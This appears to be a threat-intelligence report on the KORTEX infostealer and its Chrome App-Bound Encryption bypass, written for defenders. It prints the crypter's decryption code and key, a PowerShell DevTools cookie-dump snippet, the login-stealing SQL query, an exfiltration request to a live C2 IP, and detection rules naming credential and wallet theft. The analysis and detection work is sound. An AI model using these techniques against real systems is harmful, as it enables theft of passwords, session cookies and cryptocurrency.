mediumStealer

KORTEX Stealer Defeats Chrome's App-Bound Encryption -- What Defenders Need to Know Now

InvestigatedMarch 16, 2026PublishedMarch 16, 2026

stealervidarstealccredential-theftc2exploitapt

TL;DR

KORTEX Stealer v3.51.2 ships with an embedded tool called chromelevator.exe that bypasses Chrome's App-Bound Encryption (ABE) -- the protection Google introduced in Chrome v127 specifically to stop infostealers from decrypting cookies and saved passwords. The stealer arrives inside a custom AES-256-CBC crypter built by a developer called "Maxim," targets 15+ browsers, five cryptocurrency wallets, Discord, Telegram, and Steam, and exfiltrates everything over plaintext HTTP to a C2 panel in the Netherlands/Germany. If your defense strategy relies on Chrome ABE as a meaningful barrier to credential theft, this post is for you.

Why This Matters

In August 2024, Google rolled out App-Bound Encryption in Chrome v127. The security community celebrated. The idea was straightforward: protect the keys that decrypt cookies and saved passwords using DPAPI bindings scoped to the Chrome application identity. Stealers could no longer just call CryptUnprotectData from an arbitrary process and walk away with the crown jewels.

For about 18 months, it worked. ABE forced stealer authors to find new approaches. Some gave up. Others pivoted to session hijacking. The better-funded operations went to work on bypasses.

KORTEX's chromelevator.exe is one of those bypasses, and it is clean, purpose-built, and already deployed in the wild. It does not rely on patching Chrome binaries or exploiting a CVE. Instead, it connects to Chrome's own IPC named pipes, establishes a Mojo channel to the running browser process, and derives the runtime decryption keys through Chrome's internal communication protocol. It speaks Chrome's language, and Chrome hands over the keys.

This is not a proof-of-concept. This is shipping inside a versioned MaaS product with a Node.js management panel.

The Kill Chain: Three Stages to Total Credential Compromise

KORTEX's infection chain is a textbook example of layered evasion meeting comprehensive collection. Each stage has a distinct purpose and a distinct author.

Stage 1: The Crypter (52.exe)

The outer binary is a custom crypter -- not KORTEX itself, but a wrapper built by a developer whose Windows username is Maxim. We know this because he left his PDB path in the binary:

C:\Users\Maxim\Desktop\Crypt\Total\x64\Release\Total.pdb

The crypter is a 3.4 MB PE32+ x64 executable compiled on 2026-02-16. Its only job is to decrypt and execute the real payload. Here is how it works:

Calls GetModuleFileNameA to find its own path on disk
Opens itself with CreateFileA and seeks to offset 0x37200 (the end of the legitimate PE sections)
Reads 3,209,241 bytes of appended data -- the AES-256-CBC encrypted KORTEX payload
Derives a decryption key using Windows CryptoAPI:

// Acquire crypto context
CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT);

// Create SHA-256 hash of 32-byte key material (0x00-0x1f sequential bytes)
CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash);
CryptHashData(hHash, keyMaterial, 32, 0);

// Derive AES-256 key
CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey);

// Decrypt payload (CBC mode, zero IV)
CryptDecrypt(hKey, 0, TRUE, 0, pbEncryptedData, &dwDataLen);

The key material is trivial -- sequential bytes 00 through 1f stored at RVA 0x2f8a8. The derived AES-256 key is:

630dcd2966c4336691125448bbb25b4ff412a49c732db2c8abc1b8581bd710dd

After decryption, the crypter checks for an MZ header and performs reflective PE loading to execute the KORTEX payload entirely in memory. A single IsDebuggerPresent check provides minimal anti-analysis.

The directory structure on Maxim's machine -- Crypt\Total -- suggests "Total" is the product name for this crypter-as-a-service. The separation between the crypter author and the stealer codebase is the first indicator that KORTEX operates as a Malware-as-a-Service platform with distinct roles: developers, crypter providers, and operators.

Stage 2: KORTEX Stealer v3.51.2

The decrypted payload is the actual KORTEX Stealer, compiled on 2026-03-01 -- two weeks after the crypter. The version string 3.51.2 appears in-binary near the marker Kortex, and the log format string - KORTEX // STEAL confirms the family identification.

At 3.2 MB, this is a large native binary with an enormous .rsrc section (1.38 MB, entropy 7.80) containing the embedded chromelevator.exe. The .text section at 1.37 MB reflects the breadth of the stealer's collection capabilities.

The import table tells the full story of what this binary does:

DLL	Key Functions	Purpose
`CRYPT32.dll`	`CryptUnprotectData`	DPAPI decryption (pre-v127 Chrome)
`bcrypt.dll`	`BCryptDecrypt`, `BCryptGenerateSymmetricKey`	AES-256-GCM decryption (Chrome v80-v126)
`WININET.dll`	`HttpSendRequestA`, `InternetReadFile`	HTTP C2 communication
`KERNEL32.dll`	`FindResourceA`, `LoadResource`	Extract embedded chromelevator
`USER32.dll`	`GetDC`, `BitBlt`	Screenshot capture

KORTEX handles three generations of Chrome credential protection in a single binary:

Pre-v80: Direct DPAPI via CryptUnprotectData
v80 to v126: AES-256-GCM decryption via BCryptDecrypt with DPAPI-protected keys
v127+: The embedded chromelevator.exe bypass

Stage 3: chromelevator.exe -- The ABE Bypass

This is the component that should concern defenders most.

chromelevator.exe (compiled 2026-01-24, SHA256: a95ad2f...) is a dedicated Chrome App-Bound Encryption bypass tool. It is extracted from the KORTEX binary's resources at runtime (resource ID 101, RT_RCDATA) and executes as a separate process.

The bypass mechanism does not exploit a vulnerability in the traditional sense. It exploits Chrome's architecture:

Locates the running Chrome process and enumerates its IPC named pipes
Connects to Chrome's Mojo IPC channel via named pipes matching patterns:
```
mojo.%u.%u.%04X.chrome
chrome.sync.%u.%u.%04X
chrome.nacl.%u_%04X
```
Derives runtime decryption keys by communicating through Chrome's own IPC protocol -- the same channel that Chrome's internal components use to access the encryption service
Decrypts cookies and passwords using the derived keys
Returns results via a completion pipe named __DLL_PIPE_COMPLETION_SIGNAL__

The chromelevator itself contains another encrypted resource (1,076,736 bytes at entropy 8.00), likely a DLL payload that gets injected through the Chrome IPC mechanism.

Targeted browsers: Chrome, Chrome Beta, Microsoft Edge, Brave. Any Chromium-based browser using App-Bound Encryption is vulnerable to this technique.

Key strings from the binary confirm its purpose:

App-Bound Encryption Key
Copilot App-Bound Encryption Key
Deriving runtime decryption keys...
[+] IPC pipe established:
[+] Payload decrypted (

The "Copilot App-Bound Encryption Key" string is notable -- it suggests the tool also targets Microsoft Edge's Copilot-specific encrypted storage, indicating active development against Edge's ABE implementation.

Fallback: PowerShell DevTools Extraction

When chromelevator cannot execute (insufficient privileges, Chrome not running, etc.), KORTEX falls back to a PowerShell-based technique that launches Chrome with remote debugging enabled and extracts cookies through the Chrome DevTools Protocol:

$r = Invoke-RestMethod -Uri http://127.0.0.1:<PORT>/json/list -TimeoutSec 7
$ws = $r[0].webSocketDebuggerUrl
$s = New-Object System.Net.WebSockets.ClientWebSocket
$s.ConnectAsync($ws, $c).Wait(5000)
$msg = '{"id":1,"method":"Network.getAllCookies"}'
# Sends CDP command over WebSocket and reads response

This technique spawns Chrome with --remote-debugging-port=<N>, connects to the DevTools WebSocket, and calls Network.getAllCookies to dump the full cookie jar. It is noisier than the chromelevator approach but effective when the IPC bypass is unavailable.

What KORTEX Steals

The collection scope is comprehensive. KORTEX targets every credential store, session token, and cryptocurrency wallet a typical Windows user might have.

Browsers (15+ families)

Chromium-based: Chrome, Brave, Edge, Opera, Opera GX Gecko-based: Firefox, SeaMonkey, IceCat, Floorp, LibreWolf, K-Meleon, Pale Moon, Basilisk

For each browser, KORTEX extracts:

Saved passwords (SELECT origin_url, username_value, password_value FROM logins)
Cookies (session tokens for every logged-in service)
Credit card data (Cards.txt)
Google OAuth refresh tokens (Google Refresh.txt)

Cryptocurrency Wallets

Target	Path	Data
Bitcoin Core	`%APPDATA%\Bitcoin\wallet.dat`	Full wallet file
Dogecoin	`%APPDATA%\Dogecoin\wallet.dat`	Full wallet file
Litecoin	`%APPDATA%\Litecoin\wallet.dat`	Full wallet file
Exodus	`%APPDATA%\Exodus\exodus.wallet`	Wallet data
Electrum	`%APPDATA%\Electrum\wallets\`	All wallet files

Browser Extension Wallets

Extension	ID	Blockchain
MetaMask	`nkbihfbeogaeaoehlefnkodbefgpgknn`	Ethereum
Binance Chain	`fhbohimaelbohpjbbldcngcnapndodjp`	BNB Chain
Coinbase Wallet	`ibnejdfjmmkpcnlpebklmnkoeoihofec`	Multi-chain
Yoroi	`bfnaoomepdephakilknabebedabbakib`	Cardano

Messaging and Gaming Platforms

Discord: Scrapes LevelDB from %APPDATA%\discord\Local Storage\leveldb\, validates every token against https://discord.com/api/v9/users/@me
Telegram: Copies the tdata session directory wholesale from %APPDATA%\Telegram Desktop\tdata\
Steam: Reads registry at HKCU\Software\Valve\Steam for install path and username, steals session cookies

System Fingerprinting

Before exfiltrating, KORTEX builds a victim profile:

Public IP via api.ipify.org
OS version from registry
RAM via GlobalMemoryStatusEx
Display resolution and GPU via EnumDisplayDevicesA
Desktop screenshot via GDI BitBlt (saved as Screenshot.bmp)

C2 Infrastructure

The stolen data is packaged and exfiltrated over plaintext HTTP to a bare IP address -- no domain, no TLS.

Exfiltration Protocol

POST /getlog/x/ HTTP/1.1
Host: 83.217.208.93
User-Agent: wininet/1.0
pcName: VICTIM-PC
Authorization: <operator_token>
Content-Type: application/octet-stream
Content-Length: <size>

[ZIP archive of stolen data]

The wininet/1.0 User-Agent is a hardcoded string -- not a real WinINet identifier -- and is a high-fidelity detection signature. The pcName header leaks the victim's hostname in every request.

C2 Server Profile

Field	Value
IP	`83[.]217[.]208[.]93`
ASN	AS215826
Provider	Partner Hosting LTD
Location	Amsterdam/Frankfurt
Port 22	OpenSSH 8.9p1 Ubuntu-3ubuntu0.14
Port 80	nginx/1.18.0 (Ubuntu) -- returns 403 Forbidden
Port 3000	Node.js Express panel (behind nginx reverse proxy)
Network	`83[.]217[.]208[.]0/24`
Abuse Contact	abuse@altawk[.]com

The management panel on port 3000 returns X-Powered-By: Express with CORS headers (Access-Control-Allow-Credentials: true, Vary: Origin), indicating a browser-based dashboard designed for multiple operators to view stolen logs. This is consistent with KORTEX's MaaS model -- the panel serves the same function as panels for Raccoon, Vidar, or StealC.

Partner Hosting LTD (AS215826) is a known bulletproof-adjacent hosting provider. The use of a bare IP with no associated domain minimizes WHOIS exposure and makes takedown more difficult.

Attribution: Who Is "Maxim"?

The PDB path is the primary attribution artifact:

C:\Users\Maxim\Desktop\Crypt\Total\x64\Release\Total.pdb

This tells us:

Windows username: Maxim
Project structure: Desktop\Crypt\Total\ -- a crypter project called "Total"
Build configuration: Release x64 (production build, not debug)
Role: Crypter developer/operator, not necessarily the KORTEX stealer author

The separation between the crypter (compiled 2026-02-16 by "Maxim") and the KORTEX payload (compiled 2026-03-01, version 3.51.2 with a professional web panel) strongly suggests that Maxim is a KORTEX customer, not the developer. He built or purchased the "Total" crypter to wrap a commercially available stealer.

The name "Maxim" is common across Russian and Eastern European cultures. Combined with the MaaS model (which has deep roots in Russian-speaking cybercrime forums), we assess with LOW confidence that the operator is Russian-speaking. The name alone is insufficient for higher-confidence attribution.

Timeline

Date	Event
2026-01-24	`chromelevator.exe` compiled
2026-02-16	Crypter (`Total.exe` / `52.exe`) compiled
2026-03-01	KORTEX v3.51.2 payload compiled
2026-03-12	C2 at `83[.]217[.]208[.]93` confirmed live (Shodan)
2026-03-16	Sample first submitted to MalwareBazaar

The two-month gap between the chromelevator compilation and the stealer payload suggests the ABE bypass tool was developed as a standalone component and later integrated into the KORTEX package -- likely as a selling point for the MaaS platform.

MITRE ATT&CK Mapping

ID	Technique	KORTEX Implementation
T1059.001	PowerShell	Chrome DevTools cookie extraction fallback
T1055	Process Injection	Reflective PE loading of decrypted payload
T1027.002	Software Packing	AES-256-CBC encrypted payload appended to crypter
T1140	Deobfuscate/Decode Files	CryptoAPI-based AES decryption at runtime
T1082	System Information Discovery	OS, RAM, GPU, display enumeration
T1113	Screen Capture	GDI BitBlt desktop screenshot
T1555.003	Credentials from Web Browsers	15+ browsers, three Chrome protection generations
T1539	Steal Web Session Cookie	DPAPI, BCrypt, DevTools Protocol, chromelevator
T1528	Steal Application Access Token	Discord tokens, Telegram sessions
T1560	Archive Collected Data	ZIP packaging before exfiltration
T1041	Exfiltration Over C2 Channel	HTTP POST to `/getlog/x/`
T1071.001	Web Protocols	Custom `wininet/1.0` User-Agent
T1622	Debugger Evasion	`IsDebuggerPresent` in crypter
T1657	Financial Theft	BTC, DOGE, LTC, Exodus, Electrum wallet theft

IOC Summary

File Hashes

SHA256	Component
`10d5631af53770428ddc903808406d8da87c185f3c2a6a8a082064a9ca9aba7e`	Crypter (52.exe)
`1e21918861579efeb185a8ce0b16fa6d10132343a8e9fa31be381f0f0148b287`	KORTEX Stealer v3.51.2 (decrypted payload)
`a95ad2f5dec66f6ce6c7ab58d158b64225437e42e2397b8f958bfa507ebb7dbe`	chromelevator.exe (ABE bypass)

Additional hashes for the crypter:

MD5: b06d01a8e1e7de9b0463faed715bdacd
SHA1: 7d97e6619f00ab7c0877632c22b0f1921d2666b5
Imphash (payload): 779d8355255925724444e6d96de9d1a8

Network Indicators

IOC	Type	Context
`83[.]217[.]208[.]93`	IPv4	C2 server (Partner Hosting LTD, AS215826)
`hxxp://83[.]217[.]208[.]93/getlog/x/`	URL	Data exfiltration endpoint
`hxxp://83[.]217[.]208[.]93:3000/`	URL	KORTEX operator panel

Behavioral Indicators

Indicator	Type
`User-Agent: wininet/1.0`	HTTP header (all C2 traffic)
`pcName:` header in HTTP POST	Custom HTTP header
`POST /getlog/x/`	HTTP request path
`- KORTEX // STEAL`	In-memory string
Pipe: `mojo...*.chrome`	Named pipe pattern
Pipe: `__DLL_PIPE_COMPLETION_SIGNAL__`	Named pipe
`C:\Users\Maxim\Desktop\Crypt\Total\x64\Release\Total.pdb`	PDB path

Detection Guidance

YARA Rules

rule KORTEX_Stealer_Crypter_Maxim {
    meta:
        author = "GHOST - Breakglass Intelligence"
        date = "2026-03-16"
        description = "Detects KORTEX Stealer crypter authored by Maxim"
        hash = "10d5631af53770428ddc903808406d8da87c185f3c2a6a8a082064a9ca9aba7e"
        tlp = "WHITE"
    strings:
        $pdb = "\\Users\\Maxim\\Desktop\\Crypt\\Total\\x64\\Release\\Total.pdb" ascii
        $crypto1 = "CryptAcquireContextW" ascii
        $crypto2 = "CryptDeriveKey" ascii
        $crypto3 = "CryptDecrypt" ascii
    condition:
        uint16(0) == 0x5A4D and $pdb and 2 of ($crypto*)
}

rule KORTEX_Stealer_Payload {
    meta:
        author = "GHOST - Breakglass Intelligence"
        date = "2026-03-16"
        description = "Detects KORTEX Stealer v3 payload"
        hash = "1e21918861579efeb185a8ce0b16fa6d10132343a8e9fa31be381f0f0148b287"
        tlp = "WHITE"
    strings:
        $brand1 = "- KORTEX // STEAL" ascii
        $brand2 = "Kortex" ascii wide
        $ua = "wininet/1.0" ascii
        $c2path = "/getlog/x/" ascii
        $header = "pcName:" ascii
        $chrome1 = "App-Bound Encryption Key" ascii wide
        $chrome2 = "__DLL_PIPE_COMPLETION_SIGNAL__" ascii wide
        $sql1 = "SELECT origin_url, username_value, password_value FROM logins" ascii
        $wallet1 = "\\Bitcoin\\wallet.dat" ascii
        $wallet2 = "\\Exodus\\exodus.wallet" ascii
        $ext1 = "nkbihfbeogaeaoehlefnkodbefgpgknn" ascii
    condition:
        uint16(0) == 0x5A4D and filesize < 10MB and
        (1 of ($brand*) or (2 of ($ua, $c2path, $header)) or $chrome1 or
        (3 of ($sql1, $wallet1, $wallet2, $ext1, $chrome2)))
}

rule Chromelevator_ABE_Bypass {
    meta:
        author = "GHOST - Breakglass Intelligence"
        date = "2026-03-16"
        description = "Detects chromelevator Chrome App-Bound Encryption bypass tool"
        hash = "a95ad2f5dec66f6ce6c7ab58d158b64225437e42e2397b8f958bfa507ebb7dbe"
        tlp = "WHITE"
    strings:
        $s1 = "App-Bound Encryption Key" ascii wide
        $s2 = "Copilot App-Bound Encryption Key" ascii wide
        $s3 = "Deriving runtime decryption keys" ascii wide
        $s4 = "__DLL_PIPE_COMPLETION_SIGNAL__" ascii wide
        $pipe1 = "mojo.%u.%u.%04X.chrome" ascii
        $pipe2 = "chrome.sync.%u.%u.%04X" ascii
        $pipe3 = "chrome.nacl.%u_%04X" ascii
    condition:
        uint16(0) == 0x5A4D and filesize < 5MB and
        (2 of ($s*) or 2 of ($pipe*))
}

Suricata Rules

alert http $HOME_NET any -> $EXTERNAL_NET any (
    msg:"BGI - KORTEX Stealer C2 Exfiltration (wininet/1.0 UA + /getlog/)";
    flow:established,to_server;
    content:"POST"; http_method;
    content:"/getlog/"; http_uri;
    content:"wininet/1.0"; http_user_agent;
    reference:url,intel.breakglass.tech;
    classtype:trojan-activity;
    sid:9000101; rev:1;
)

alert http $HOME_NET any -> $EXTERNAL_NET any (
    msg:"BGI - KORTEX Stealer C2 pcName Header";
    flow:established,to_server;
    content:"pcName:"; http_header;
    content:"application/octet-stream"; http_header;
    reference:url,intel.breakglass.tech;
    classtype:trojan-activity;
    sid:9000102; rev:1;
)

alert http $HOME_NET any -> 83.217.208.0/24 any (
    msg:"BGI - KORTEX Stealer Known C2 Network";
    flow:established,to_server;
    reference:url,intel.breakglass.tech;
    classtype:trojan-activity;
    sid:9000103; rev:1;
)

Endpoint Detection Priorities

Named pipe monitoring: Alert on creation of pipes matching mojo.*.*.*.chrome by non-Chrome processes, and any process creating __DLL_PIPE_COMPLETION_SIGNAL__
Chrome DevTools abuse: Detect Chrome launched with --remote-debugging-port by a parent process that is not a developer tool
Self-reading binaries: Flag processes that open their own executable, seek past the PE sections, and call CryptoAPI decryption functions
Credential store access: Monitor for non-browser processes accessing Login Data, Cookies, or Local State files under Chrome/Edge/Brave user data directories
Bulk file access: Alert on rapid sequential access to Discord LevelDB, Telegram tdata, and cryptocurrency wallet paths from a single process

So What? Defender Takeaways

Chrome ABE is no longer a reliable defense layer. The chromelevator technique does not exploit a bug -- it exploits Chrome's IPC architecture to derive keys at runtime. Google can (and likely will) harden this path, but the cat is out of the bag. Stealer operators are shipping production-grade ABE bypasses in versioned MaaS products.

What to do right now:

Deploy the YARA and Suricata rules above. The wininet/1.0 User-Agent and /getlog/x/ path are high-fidelity, low-false-positive signatures. Use them.
Block 83[.]217[.]208[.]93 at your perimeter. The C2 is live as of 2026-03-16 with an active Express panel on port 3000.
Monitor named pipe creation. The mojo.*chrome and __DLL_PIPE_COMPLETION_SIGNAL__ pipe patterns are distinctive. No legitimate software creates these pipes outside of the Chrome process tree.
Hunt for --remote-debugging-port in process command lines. This is the fallback technique. If Chrome is being launched with remote debugging by a non-developer parent process, you have an active compromise.
Do not rely solely on browser-level encryption for credential security. Use hardware security keys (FIDO2/WebAuthn) for critical accounts. Session tokens protected by ABE are now accessible to commodity stealers. Assume cookies can be stolen and design your session management accordingly -- short-lived tokens, device binding, anomaly detection on session reuse.
Audit your cryptocurrency exposure. KORTEX grabs wallet files wholesale. If your organization has users with desktop crypto wallets, those funds are one click away from gone. Move to hardware wallets.
Report the C2. Abuse contact for the hosting provider is abuse@altawk[.]com. The more reports they receive, the faster the infrastructure goes dark.

The version number -- 3.51.2 -- tells you this is not someone's first attempt. KORTEX is a mature product with an active development cycle. The chromelevator was compiled two months before the stealer payload, suggesting a deliberate R&D effort to solve the ABE problem. Expect variants. Expect evolution. Detect the behavior, not just the hashes.

Analysis by GHOST -- Breakglass Intelligence. Investigation conducted 2026-03-16.

IOCs, STIX bundle, and raw investigation data available at intel.breakglass.tech.